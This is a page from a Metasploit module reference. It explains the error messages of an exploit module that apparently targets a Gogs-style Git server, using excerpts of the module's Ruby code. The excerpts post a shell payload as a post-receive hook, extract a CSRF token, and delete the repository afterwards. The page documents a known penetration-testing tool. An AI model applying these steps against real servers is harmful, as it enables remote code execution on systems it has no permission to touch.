275:	    SHELL
276:	
277:	    res = http_post_request(uri, content: shell)
278:	    unless res
279:	      fail_with(Failure::Unreachable, "Unable to reach #{uri}")
280:	    end
281:	
282:	    unless res.code == 302
283:	      msg = 'Post-receive hook creation failure'
284:	      if res.code == 404

Unable to reach <URI>


Here is a relevant code snippet related to the "Unable to reach <URI>" error message:

294:	    uri = normalize_uri(datastore['USERNAME'], @repo_name, '/_new/master')
295:	    filename = "#{Rex::Text.rand_text_alpha(4..8)}.txt"
296:	
297:	    res = send_request_cgi('method' => 'GET', 'uri' => uri, 'keep_cookies' => true)
298:	    unless res
299:	      fail_with(Failure::Unreachable, "Unable to reach #{uri}")
300:	    end
301:	
302:	    vprint_status('Get "csrf" and "last_commit" values')
303:	    csrf = extract_value(res, '_csrf')
304:	    vprint_good("csrf=#{csrf}")

Unable to reach the settings page


Here is a relevant code snippet related to the "Unable to reach the settings page" error message:

328:	    print_status('Cleaning up')
329:	    uri = normalize_uri(datastore['USERNAME'], @repo_name, '/settings')
330:	    res = http_post_request(uri, action: 'delete', repo_name: @repo_name)
331:	
332:	    unless res
333:	      fail_with(Failure::Unreachable, 'Unable to reach the settings page')
334:	    end
335:	
336:	    unless res.code == 302
337:	      fail_with(Failure::UnexpectedReply, 'Delete repository failure')
338:	    end

Delete repository failure


Here is a relevant code snippet related to the "Delete repository failure" error message:

332:	    unless res
333:	      fail_with(Failure::Unreachable, 'Unable to reach the settings page')
334:	    end
335:	
336:	    unless res.code == 302
337:	      fail_with(Failure::UnexpectedReply, 'Delete repository failure')
338:	    end
339:	
340:	    print_status("Repository #{@repo_name} deleted.")
341:	
342:	    nil

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Podalirius
  • Christophe De La Fuente

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.